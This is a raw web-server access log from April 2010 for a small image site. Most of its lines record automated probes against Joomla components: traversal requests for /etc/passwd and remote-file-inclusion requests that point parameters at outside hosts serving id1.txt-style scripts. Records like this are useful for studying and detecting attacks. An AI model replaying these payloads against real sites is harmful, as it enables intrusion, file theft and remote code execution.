207.46.13.141 - - [25/Apr/2010:19:02:25 -0500] "GET /logs/access_log.1160611200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.46 - - [25/Apr/2010:19:05:55 -0500] "GET /logs/access_log.1218758400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.214.49 - - [25/Apr/2010:19:14:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.214.49 - - [25/Apr/2010:19:14:18 -0500] "GET /costume/costume63%20copy.JPG HTTP/1.1" 200 17743 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
195.160.224.208 - - [25/Apr/2010:19:17:36 -0500] "GET /logs/access_log.1267574400///index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
195.160.224.208 - - [25/Apr/2010:19:17:37 -0500] "GET ///index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.160.224.208 - - [25/Apr/2010:19:17:37 -0500] "GET /logs///index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
72.46.157.102 - - [25/Apr/2010:19:20:01 -0500] "GET /logs/access_log.1223164800//?_SERVER[DOCUMENT_ROOT]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:19:20:01 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:19:20:01 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 200 3223 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:19:25:49 -0500] "GET /logs/access_log.1220054400//?_SERVER[DOCUMENT_ROOT]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.46.13.99 - - [25/Apr/2010:19:58:25 -0500] "GET /logs/access_log.1228780800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.34.175.15 - - [25/Apr/2010:19:58:49 -0500] "GET //components/errors.php?error=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
200.34.175.15 - - [25/Apr/2010:19:58:49 -0500] "GET /logs//components/errors.php?error=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.34.175.15 - - [25/Apr/2010:19:58:49 -0500] "GET /logs/access_log.1220054400//components/errors.php?error=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
207.46.13.41 - - [25/Apr/2010:19:59:25 -0500] "GET /logs/access_log.1249257600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [25/Apr/2010:19:59:41 -0500] "GET /logs/access_log.1266710400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.34.175.15 - - [25/Apr/2010:20:05:04 -0500] "GET /logs/access_log.1220054400%20%20//components/errors.php?error=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.118.82.120 - - [25/Apr/2010:20:06:01 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.118.82.120 - - [25/Apr/2010:20:06:01 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.118.82.120 - - [25/Apr/2010:20:06:01 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.118.82.120 - - [25/Apr/2010:20:06:10 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
212.94.64.154 - - [25/Apr/2010:20:07:22 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.94.64.154 - - [25/Apr/2010:20:07:22 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
212.94.64.154 - - [25/Apr/2010:20:07:22 -0500] "GET /logs/access_log.1219363200%20%20//classes/adodbt/sql.php?classes_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:07:53 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:07:53 -0500] "GET /logs/access_log.1262736000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:07:53 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:08:23 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:08:23 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:08:23 -0500] "GET /logs/access_log.1262736000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:08:39 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:08:39 -0500] "GET /logs/access_log.1262736000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:08:39 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.118.82.120 - - [25/Apr/2010:20:09:36 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.118.82.120 - - [25/Apr/2010:20:09:36 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.presstige.cz/Gurman2/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.131 - - [25/Apr/2010:20:16:55 -0500] "GET /logs/access_log.1235779200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.184 - - [25/Apr/2010:20:25:54 -0500] "GET /logs/access_log.1230940800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [25/Apr/2010:20:32:36 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [25/Apr/2010:20:32:36 -0500] "GET /logs/access_log.1161734400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.222.152.66 - - [25/Apr/2010:20:33:13 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:13 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:13 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:14 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:14 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:14 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:23 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:23 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:23 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:32 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:32 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:33:32 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
174.121.83.94 - - [25/Apr/2010:20:34:01 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.121.83.94 - - [25/Apr/2010:20:34:01 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
174.121.83.94 - - [25/Apr/2010:20:34:01 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:34:24 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:34:24 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:34:24 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
207.46.195.226 - - [25/Apr/2010:20:34:24 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.222.152.66 - - [25/Apr/2010:20:34:32 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:34:32 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:34:32 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:35:15 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:35:15 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:35:15 -0500] "GET /logs/access_log.1266364800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:35:15 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:35:31 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:35:31 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:35:32 -0500] "GET /logs/access_log.1266364800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:35:32 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
174.121.83.94 - - [25/Apr/2010:20:39:02 -0500] "GET /logs/access_log.1267920000//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:10 -0500] "GET /index1.php?choix=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:10 -0500] "GET /logs/index1.php?choix=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:10 -0500] "GET /logs/access_log.1264636800/index1.php?choix=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:10 -0500] "GET /logs/access_log.1266537600/index1.php?choix=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.83.94 - - [25/Apr/2010:20:41:13 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:16 -0500] "GET /logs/access_log.1262822400/index1.php?choix=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:16 -0500] "GET /logs/index1.php?choix=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:16 -0500] "GET /index1.php?choix=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:16 -0500] "GET /logs/access_log.1264636800/index1.php?choix=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:20:41:40 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:20:41:40 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:20:41:40 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:45 -0500] "GET /logs/access_log.1262822400/index1.php?choix=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:20:41:49 -0500] "GET /logs/access_log.1266537600/index1.php?choix=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:42:33 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:42:33 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:42:33 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:43:15 -0500] "GET /logs/access_log.1265760000/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:43:15 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:43:15 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:20:48:13 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:20:48:13 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:20:48:13 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:49:58 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:49:58 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:49:58 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:20:49:58 -0500] "GET /logs/access_log.1266364800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:52:35 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:52:35 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:52:35 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:52:35 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:52:35 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:52:35 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:20:53:39 -0500] "GET /logs/access_log.1219708800/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.218.160 - - [25/Apr/2010:20:54:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.222.152.66 - - [25/Apr/2010:20:54:25 -0500] "GET /logs/access_log.1219708800/components/com_colorlab/admin.color.php?mosConfig_live_site=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:20:54:46 -0500] "GET /logs/access_log.1219708800/components/com_colorlab/admin.color.php?mosConfig_live_site=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:20:57:07 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.121.121.28 - - [25/Apr/2010:20:59:01 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.121.121.28 - - [25/Apr/2010:20:59:01 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.121.121.28 - - [25/Apr/2010:20:59:01 -0500] "GET /logs/access_log.1268956800//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.195.112.180 - - [25/Apr/2010:20:59:31 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.126.28.140 - - [25/Apr/2010:21:03:53 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:21:03:53 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:21:03:53 -0500] "GET /logs/access_log.1217203200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:21:14:16 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:21:14:16 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:21:14:16 -0500] "GET /logs/access_log.1212969600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
64.141.103.201 - - [25/Apr/2010:21:15:53 -0500] "GET /logs/access_log.1220054400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
114.78.23.84 - - [25/Apr/2010:21:19:47 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/search?q=Vintage+Tattoo+Flash&FORM=R5FD6""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:48 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:50 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:54 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:54 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:54 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
